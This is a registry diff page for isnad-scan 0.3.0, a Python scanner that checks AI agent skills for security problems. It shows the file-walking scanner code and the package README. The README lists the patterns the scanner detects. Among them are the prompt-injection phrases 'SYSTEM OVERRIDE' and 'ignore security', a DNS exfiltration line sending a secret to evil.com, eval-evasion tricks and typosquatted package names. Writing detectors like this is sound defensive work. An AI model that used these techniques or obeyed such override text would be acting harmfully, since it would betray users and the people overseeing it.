PyPI - isnad-scan - Versions diffs - 0.3.0__py3-none-any.whl - Mend

isnad-scan 0.3.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (12) hide show

isnad_scan/__init__.py +2 -0
isnad_scan/ast_analyzer.py +374 -0
isnad_scan/binary_scanner.py +230 -0
isnad_scan/cli.py +221 -0
isnad_scan/cve_checker.py +238 -0
isnad_scan/js_analyzer.py +154 -0
isnad_scan/patterns.py +573 -0
isnad_scan/scanner.py +342 -0
isnad_scan-0.3.0.dist-info/METADATA +186 -0
isnad_scan-0.3.0.dist-info/RECORD +12 -0
isnad_scan-0.3.0.dist-info/WHEEL +4 -0
isnad_scan-0.3.0.dist-info/entry_points.txt +2 -0

isnad_scan/scanner.py ADDED Viewed

@@ -0,0 +1,342 @@
+"""Core scanning logic."""
+import hashlib
+import json
+import os
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Dict, List, Optional, Set
+from urllib.parse import urlparse
+from .patterns import Finding, Severity, scan_content, scan_dependencies
+from .ast_analyzer import analyze_python_ast, is_python_file
+from .cve_checker import check_dependencies_for_cves
+from .js_analyzer import analyze_javascript, is_javascript_file
+from .binary_scanner import scan_binary_file, is_binary_file, is_image_file, BINARY_EXTENSIONS, IMAGE_EXTENSIONS
+# Suffixes of text files eligible for content scanning, grouped by kind.
+SCANNABLE_EXTENSIONS = {
+    # Source code
+    '.py', '.js', '.ts', '.jsx', '.tsx', '.mjs', '.cjs',
+    # Shell scripts
+    '.sh', '.bash', '.zsh', '.fish',
+    # Documentation
+    '.md', '.markdown', '.txt', '.rst',
+    # Markup
+    '.html', '.htm', '.xml',
+    # Configuration
+    '.yaml', '.yml', '.json', '.toml', '.ini', '.cfg',
+    # Environment files
+    '.env', '.env.example', '.env.local',
+}
+# Suffixes routed to the binary scanner instead of the text scanner.
+BINARY_SCAN_EXTENSIONS = BINARY_EXTENSIONS | IMAGE_EXTENSIONS
+# Dependency manifests (matched by exact file name) that get extra dependency checks.
+DEPENDENCY_FILES = {
+    # Python
+    'requirements.txt', 'requirements-dev.txt', 'requirements-test.txt',
+    'Pipfile', 'pyproject.toml', 'setup.py', 'setup.cfg',
+    # JavaScript
+    'package.json', 'package-lock.json', 'yarn.lock',
+    # Ruby
+    'Gemfile', 'Gemfile.lock',
+    # Go
+    'go.mod', 'go.sum',
+    # Rust
+    'Cargo.toml', 'Cargo.lock',
+}
+# File names that are scanned no matter what their extension is.
+ALWAYS_SCAN = {
+    'SKILL.md',
+    'README.md',
+    'AGENTS.md',
+    'Dockerfile',
+    'Makefile',
+}
+# Directory names that are pruned from the walk.
+SKIP_DIRS = {
+    'node_modules', '__pycache__',
+    '.git', 'venv', '.venv',
+    'dist', 'build',
+    '.tox', '.pytest_cache', '.mypy_cache',
+    'egg-info', '.eggs',
+    'htmlcov', '.coverage',
+}
+# Largest file (in bytes) that will be read for scanning: 1 MiB.
+MAX_FILE_SIZE = 1 << 20
+@dataclass
+class ScanResult:
+    """Aggregated outcome of scanning one skill (a directory or a single file)."""
+    # The path (or URL string) that was requested for scanning.
+    path: str
+    # Every finding collected from all scanned files.
+    findings: List[Finding] = field(default_factory=list)
+    # Number of files handed to a scanner.
+    files_scanned: int = 0
+    # Number of files that were not scanned.
+    files_skipped: int = 0
+    # Error messages produced while scanning.
+    errors: List[str] = field(default_factory=list)
+    # Non-fatal notices produced while scanning.
+    warnings: List[str] = field(default_factory=list)
+    # Per-file content hash, keyed by the file path string.
+    file_hashes: Dict[str, str] = field(default_factory=dict)
+    # Paths of symlinks that were flagged during the scan.
+    symlinks_found: List[str] = field(default_factory=list)
+    @property
+    def trust_level(self) -> str:
+        """Return "DANGER", "WARN", "CAUTION" or "SAFE" for the collected findings.
+
+        Any DANGER finding yields "DANGER"; more than three WARN findings
+        yield "WARN"; at least one WARN finding, or any recorded symlink,
+        yields "CAUTION"; otherwise the result is "SAFE".
+        """
+        dangers = len([item for item in self.findings if item.severity == Severity.DANGER])
+        warns = len([item for item in self.findings if item.severity == Severity.WARN])
+        if dangers > 0:
+            return "DANGER"
+        if warns > 3:
+            return "WARN"
+        # A recorded symlink is treated as suspicious even without WARN findings.
+        if warns > 0 or self.symlinks_found:
+            return "CAUTION"
+        return "SAFE"
+    @property
+    def exit_code(self) -> int:
+        """Return the CLI exit code: 2 for DANGER, 1 for WARN/CAUTION, 0 otherwise."""
+        codes = {"DANGER": 2, "WARN": 1, "CAUTION": 1}
+        return codes.get(self.trust_level, 0)
+    def summary(self) -> dict:
+        """Return a dict of headline statistics for this scan."""
+        def tally(severity) -> int:
+            return len([item for item in self.findings if item.severity == severity])
+        return {
+            "trust_level": self.trust_level,
+            "files_scanned": self.files_scanned,
+            "files_skipped": self.files_skipped,
+            "findings": {
+                "danger": tally(Severity.DANGER),
+                "warn": tally(Severity.WARN),
+                "info": tally(Severity.INFO),
+            },
+            "errors": len(self.errors),
+            "warnings": len(self.warnings),
+            "symlinks": len(self.symlinks_found),
+        }
+    @property
+    def content_hash(self) -> str:
+        """Return a 16-hex-char digest over all per-file hashes, or "" if there are none."""
+        if not self.file_hashes:
+            return ""
+        # Sort by path so the digest does not depend on traversal order.
+        entries = [f"{name}:{digest}" for name, digest in sorted(self.file_hashes.items())]
+        joined = "|".join(entries)
+        return hashlib.sha256(joined.encode()).hexdigest()[:16]
+def should_scan_file(path: Path) -> bool:
+    """Determine if a file should be scanned (text files).
+
+    A file qualifies when its name is in ALWAYS_SCAN or DEPENDENCY_FILES,
+    when its lower-cased name is itself listed in SCANNABLE_EXTENSIONS, or
+    when its lower-cased final suffix is listed there.
+    """
+    name = path.name
+    if name in ALWAYS_SCAN or name in DEPENDENCY_FILES:
+        return True
+    # pathlib gives dotfiles no suffix: Path('.env').suffix is '' and
+    # Path('.env.local').suffix is '.local'. Entries such as '.env' and
+    # '.env.example' therefore have to be matched against the whole name,
+    # otherwise environment files are silently skipped.
+    if name.lower() in SCANNABLE_EXTENSIONS:
+        return True
+    return path.suffix.lower() in SCANNABLE_EXTENSIONS
+def should_scan_binary(path: Path) -> bool:
+    """Return True when the file's lower-cased suffix is in BINARY_SCAN_EXTENSIONS."""
+    extension = path.suffix.lower()
+    return extension in BINARY_SCAN_EXTENSIONS
+def is_dependency_file(path: Path) -> bool:
+    """Return True when the file name exactly matches a known dependency manifest."""
+    manifest_name = path.name
+    return manifest_name in DEPENDENCY_FILES
+def check_symlink_safety(path: Path, base_dir: Path) -> tuple[bool, Optional[str]]:
+    """
+    Decide whether ``path`` is a symlink whose target stays inside ``base_dir``.
+    Paths that are not symlinks are always reported as safe.
+    Returns (is_safe, error_message); error_message is None when safe.
+    """
+    if not path.is_symlink():
+        return True, None
+    try:
+        target = path.resolve()
+        root = base_dir.resolve()
+        stays_inside = target.is_relative_to(root)
+    except Exception as exc:
+        # Any failure while resolving is reported as unsafe rather than raised.
+        return False, f"Could not resolve symlink {path}: {exc}"
+    if stays_inside:
+        return True, None
+    return False, f"Symlink escapes skill directory: {path} -> {target}"
+def hash_content(content: str) -> str:
+    """Return the first 16 hex characters of the SHA-256 digest of ``content``."""
+    hasher = hashlib.sha256()
+    hasher.update(content.encode())
+    full_digest = hasher.hexdigest()
+    return full_digest[:16]
+def scan_file(path: Path, base_dir: Path, check_cves: bool = False) -> tuple[List[Finding], Optional[str], Optional[str]]:
+    """
+    Run every applicable text scanner over one file.
+    ``base_dir`` is accepted but not referenced in the body.
+    ``check_cves`` additionally runs the CVE check on dependency manifests.
+    Returns (findings, error, content_hash); on failure findings is empty,
+    error describes the problem and content_hash is None.
+    """
+    try:
+        # Oversized files are reported as an error and never read.
+        if path.stat().st_size > MAX_FILE_SIZE:
+            return [], f"File too large: {path}", None
+        # Prefer UTF-8 and fall back to latin-1 when the bytes are not valid UTF-8.
+        try:
+            text = path.read_text(encoding='utf-8')
+        except UnicodeDecodeError:
+            try:
+                text = path.read_text(encoding='latin-1')
+            except Exception:
+                return [], f"Could not decode: {path}", None
+        location = str(path)
+        digest = hash_content(text)
+        # Regex pattern scan runs on every file.
+        collected = scan_content(text, location)
+        # Language-specific analyzers.
+        if is_python_file(location):
+            collected.extend(analyze_python_ast(text, location))
+        if is_javascript_file(location):
+            collected.extend(analyze_javascript(text, location))
+        # Dependency manifests get dependency checks, plus CVE lookups on request.
+        if is_dependency_file(path):
+            collected.extend(scan_dependencies(text, location))
+            if check_cves:
+                collected.extend(check_dependencies_for_cves(text, location))
+        return collected, None, digest
+    except Exception as exc:
+        # Any other failure is returned as an error string instead of raised.
+        return [], f"Error scanning {path}: {exc}", None
+def _flag_unsafe_symlink(result: ScanResult, link: Path, base_dir: Path, pattern_id: str, fallback: str) -> bool:
+    """Record a DANGER finding when ``link`` is a symlink escaping ``base_dir``; return True if flagged."""
+    is_safe, symlink_error = check_symlink_safety(link, base_dir)
+    if is_safe:
+        return False
+    result.symlinks_found.append(str(link))
+    result.findings.append(Finding(
+        severity=Severity.DANGER,
+        pattern_id=pattern_id,
+        description=symlink_error or fallback,
+        file=str(link),
+        line=0,
+        match=str(link),
+    ))
+    return True
+def _scan_one(result: ScanResult, filepath: Path, base_dir: Path, check_cves: bool) -> None:
+    """Scan one file as text or binary (or count it as skipped) and fold the outcome into ``result``."""
+    if should_scan_file(filepath):
+        findings, error, content_hash = scan_file(filepath, base_dir, check_cves=check_cves)
+        result.findings.extend(findings)
+        result.files_scanned += 1
+        if content_hash:
+            result.file_hashes[str(filepath)] = content_hash
+        if error:
+            result.errors.append(error)
+    elif should_scan_binary(filepath):
+        # Binary files (pyc, images, etc.) go through the binary scanner.
+        bin_findings, bin_error = scan_binary_file(filepath)
+        result.findings.extend(bin_findings)
+        result.files_scanned += 1
+        if bin_error:
+            result.errors.append(bin_error)
+    else:
+        result.files_skipped += 1
+def scan_directory(path: Path, check_cves: bool = False) -> ScanResult:
+    """Scan a skill directory (or a single file) for security issues.
+
+    ``path`` is the directory to walk, or one file to scan on its own.
+    ``check_cves`` is forwarded to scan_file for dependency manifests.
+    Returns a ScanResult; a missing path is reported through ``errors``.
+
+    Hidden directories and names in SKIP_DIRS are pruned. Symlinks that
+    resolve outside the scanned directory are recorded as DANGER findings
+    and not scanned. A file whose (device, inode) pair was already seen
+    is reported as a warning and not scanned again. Every file that is
+    not scanned is counted in ``files_skipped``.
+    """
+    result = ScanResult(path=str(path))
+    base_dir = path.resolve()
+    if not path.exists():
+        result.errors.append(f"Path does not exist: {path}")
+        return result
+    if not path.is_dir():
+        # Single file: its parent directory is the boundary for the symlink
+        # check. The file is still scanned after being flagged, and binary
+        # files are dispatched exactly as in directory mode.
+        _flag_unsafe_symlink(result, path, path.parent, 'unsafe_symlink', 'Symlink to external location')
+        _scan_one(result, path, path.parent, check_cves)
+        return result
+    # Inode numbers are only unique per device, so key on (st_dev, st_ino).
+    seen_files: Set[tuple[int, int]] = set()
+    for root, dirs, files in os.walk(path, followlinks=False):
+        root_path = Path(root)
+        # Prune hidden directories and common non-code dirs in place.
+        dirs[:] = [d for d in dirs if not d.startswith('.') and d not in SKIP_DIRS]
+        # Iterate over a copy because unsafe directory symlinks are removed.
+        for d in list(dirs):
+            if _flag_unsafe_symlink(result, root_path / d, base_dir, 'unsafe_symlink_dir', 'Directory symlink to external location'):
+                dirs.remove(d)
+        for filename in files:
+            filepath = root_path / filename
+            if _flag_unsafe_symlink(result, filepath, base_dir, 'unsafe_symlink', 'Symlink to external location'):
+                result.files_skipped += 1
+                continue
+            try:
+                info = filepath.stat()
+            except (OSError, ValueError):
+                # Best effort: if the file cannot be stat'ed, scan_file below
+                # hits the same failure and reports it as an error.
+                pass
+            else:
+                identity = (info.st_dev, info.st_ino)
+                if identity in seen_files:
+                    result.warnings.append(f"Duplicate inode (possible hard link): {filepath}")
+                    result.files_skipped += 1
+                    continue
+                seen_files.add(identity)
+            _scan_one(result, filepath, base_dir, check_cves)
+    return result
+def scan_skill(path_or_url: str, check_cves: bool = False) -> ScanResult:
+    """Main entry point: scan a skill given as a local path or an http(s) URL.
+
+    URLs are not fetched; they produce a ScanResult carrying a single error.
+    Anything else is resolved as a local path and passed to scan_directory.
+    """
+    scheme = urlparse(path_or_url).scheme
+    if scheme not in ('http', 'https'):
+        local_path = Path(path_or_url).resolve()
+        return scan_directory(local_path, check_cves=check_cves)
+    # TODO: Download and scan
+    unsupported = ScanResult(path=path_or_url)
+    unsupported.errors.append("URL scanning not yet implemented - download the skill first")
+    return unsupported

isnad_scan-0.3.0.dist-info/METADATA ADDED Viewed

@@ -0,0 +1,186 @@
+Metadata-Version: 2.4
+Name: isnad-scan
+Version: 0.3.0
+Summary: Security scanner for AI agent skills - detects code injection, prompt injection, credential exfiltration, and supply chain attacks
+Project-URL: Homepage, https://isnad.md
+Project-URL: Documentation, https://isnad.md/docs
+Project-URL: Repository, https://github.com/counterspec/isnad
+Project-URL: Issues, https://github.com/counterspec/isnad/issues
+Author-email: ISNAD Protocol <rapi@base64.amsterdam>
+License: MIT
+Keywords: agents,ai,cve,scanner,security,skills,vulnerability
+Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: MIT License
+Classifier: Operating System :: OS Independent
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.11
+Classifier: Programming Language :: Python :: 3.12
+Classifier: Topic :: Security
+Classifier: Topic :: Software Development :: Quality Assurance
+Requires-Python: >=3.11
+Requires-Dist: click>=8.0
+Requires-Dist: pyyaml>=6.0
+Requires-Dist: rich>=13.0
+Description-Content-Type: text/markdown
+# ISNAD Skill Scanner
+Security scanner for AI agent skills. Detects code injection, prompt injection, credential exfiltration, evasion techniques, and malicious dependencies.
+**Version:** 0.3.0
+**Patterns:** 69 (45 DANGER, 20 WARN, 4 INFO)
+## Installation
+```bash
+cd isnad/scanner
+uv pip install -e .
+```
+Or run directly:
+```bash
+uv run python -m isnad_scan.cli <path>
+```
+## Usage
+```bash
+# Scan a skill directory
+isnad-scan ./skills/some-skill/
+# JSON output (for CI/programmatic use)
+isnad-scan ./skill --json
+# Verbose (include INFO-level findings)
+isnad-scan ./skill --verbose
+# Show content hash (for caching/comparison)
+isnad-scan ./skill --hash
+# Quiet mode (just trust level)
+isnad-scan ./skill --quiet
+```
+## Exit Codes
+| Code | Meaning |
+|------|---------|
+| 0 | SAFE - no issues found |
+| 1 | CAUTION/WARN - review recommended |
+| 2 | DANGER - security issues detected |
+| 3 | ERROR - scanner error |
+## What It Detects
+### DANGER (45 patterns)
+**Code Execution:**
+- `eval()`, `exec()`, `compile()` usage
+- `getattr(__builtins__, 'eval')` evasion
+- String concatenation building dangerous calls (`"ev"+"al"`)
+- `chr()` concatenation obfuscation
+- `new Function()` in JavaScript
+- Lambda with dangerous functions
+**Shell Injection:**
+- `subprocess` with `shell=True`
+- `os.system()`, `os.popen()`
+- `child_process.exec()` in Node.js
+- Backtick command substitution
+**Prompt Injection:**
+- Hidden instructions in HTML comments
+- "SYSTEM OVERRIDE" / "ignore security" patterns
+- Instructions to suppress reporting
+**Data Exfiltration:**
+- Credential variables sent to network
+- DNS exfiltration (`socket.gethostbyname(secret + ".evil.com")`)
+- Tor hidden service URLs
+**Obfuscation:**
+- Base64 decoding, ROT13, hex strings
+- `bytes.fromhex()`, Unicode escapes
+- Unicode homoglyph evasion (ℯval vs eval)
+**Path Traversal & Symlinks:**
+- `../../` patterns in code
+- Symlinks escaping skill directory
+**Dangerous Deserialization:**
+- `pickle.load()`, `marshal.load()`
+- Unsafe YAML loading
+**Dependency Attacks:**
+- Typosquatted packages (reqeusts, crytpography, etc.)
+- Suspicious git dependencies
+- Known malicious package names
+### WARN (20 patterns)
+- Network requests (verify destinations)
+- File write/delete operations
+- Environment variable access
+- Dynamic imports
+- Crypto library usage
+### INFO (4 patterns)
+- Subprocess with list args
+- File reads
+- Logging statements
+## Context Awareness
+The scanner is context-aware:
+- Patterns in **documentation** (markdown, comments explaining attacks) are downgraded to INFO
+- Patterns in **code blocks** within markdown are handled appropriately
+- **String literals** containing pattern names (e.g., dict keys) don't trigger false positives
+## Example
+```
+$ isnad-scan ./evasion-skill/
+╭─── ISNAD Scan: ./evasion-skill ───╮
+│ Trust Level: 🚨 DANGER            │
+╰───────────────────────────────────╯
+📁 Files scanned: 3
+🚨 DANGER findings: 18
+[DANGER] evasion.py:10 — getattr_dangerous
+    Dynamic access to dangerous function via getattr
+[DANGER] evasion.py:5 — string_concat_evasion
+    String concatenation building eval/exec - evasion attempt
+[DANGER] SKILL.md:5 — prompt_injection_html
+    Potential prompt injection - attempts to override security
+[DANGER] requirements.txt:6 — dangerous_package
+    Potentially dangerous or typosquatted package: reqeusts
+```
+## Limitations
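+What the scanner **cannot** catch (yet). Note: this list may be out of date, since this release ships `ast_analyzer`, `js_analyzer`, `binary_scanner` and `cve_checker` modules: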
+- AST-level evasion (import aliasing, nested dynamic calls)
+- Minified/bundled JavaScript
+- Binary files with embedded scripts
+- Packages with known CVEs (needs OSV integration)
+- Actual malicious intent vs. legitimate security tools
+## Roadmap
+- [x] Pattern-based scanning (69 patterns)
+- [x] Dependency scanning (typosquats, suspicious sources)
+- [x] Symlink safety checks
+- [x] Context awareness (docs vs code)
+- [x] Prompt injection detection
+- [ ] AST parsing for Python/JS
+- [ ] CVE database integration (OSV/Snyk)
+- [ ] URL scanning (download remote skills)
+- [ ] ISNAD Registry integration (inscribe attestations)
+- [ ] ClawHub pre-install hook

isnad_scan-0.3.0.dist-info/RECORD ADDED Viewed

@@ -0,0 +1,12 @@
+isnad_scan/__init__.py,sha256=cVH3AVOQHwKu6_4AqNPbwLLcOS8JaPoKFFICmmzG9iA,88
+isnad_scan/ast_analyzer.py,sha256=nE49V8UKcDtL0qYj-36dz3PAoH8UQ2RVGD9mzNT4hjw,15446
+isnad_scan/binary_scanner.py,sha256=zb8X7pfAej54uxq8K_xYvGew6ENJjcB40TOWlVb92r0,8276
+isnad_scan/cli.py,sha256=RfgKnP2tpF_ud8XrY9cH3tKY6G-gh49s7lVNljXQWbE,7475
+isnad_scan/cve_checker.py,sha256=SLElHRrQV7Q9-d9-RgDdGcUSrD8KLojFVOb5ZRkRnWU,8333
+isnad_scan/js_analyzer.py,sha256=9_z9l30AMPGm9KQKjwXNv0Ic8g4Y3zS3AtY1R0VhH2A,6967
+isnad_scan/patterns.py,sha256=E_tJzPBVb1R0hKeNzjqvqkILdH_G02md8iK0hxU-IXM,21090
+isnad_scan/scanner.py,sha256=eELhXdDgsWuJqTfwVMbUrnplKCAdj-jenDRPsx0b5bQ,12563
+isnad_scan-0.3.0.dist-info/METADATA,sha256=IlN-51e5Kcyfy4UTTI3c0IH-5Z0FITI2ec7XeVIZmqw,5332
+isnad_scan-0.3.0.dist-info/WHEEL,sha256=WLgqFyCfm_KASv4WHyYy0P3pM_m7J5L9k2skdKLirC8,87
+isnad_scan-0.3.0.dist-info/entry_points.txt,sha256=XzQEtAu7l_PAGfpehU4ZFiqybOfrKrFqkWzCNvC6_SY,51
+isnad_scan-0.3.0.dist-info/RECORD,,

isnad_scan-0.3.0.dist-info/WHEEL ADDED Viewed

@@ -0,0 +1,4 @@
+Wheel-Version: 1.0
+Generator: hatchling 1.28.0
+Root-Is-Purelib: true
+Tag: py3-none-any

isnad_scan-0.3.0.dist-info/entry_points.txt ADDED Viewed

@@ -0,0 +1,2 @@
+[console_scripts]
+isnad-scan = isnad_scan.cli:main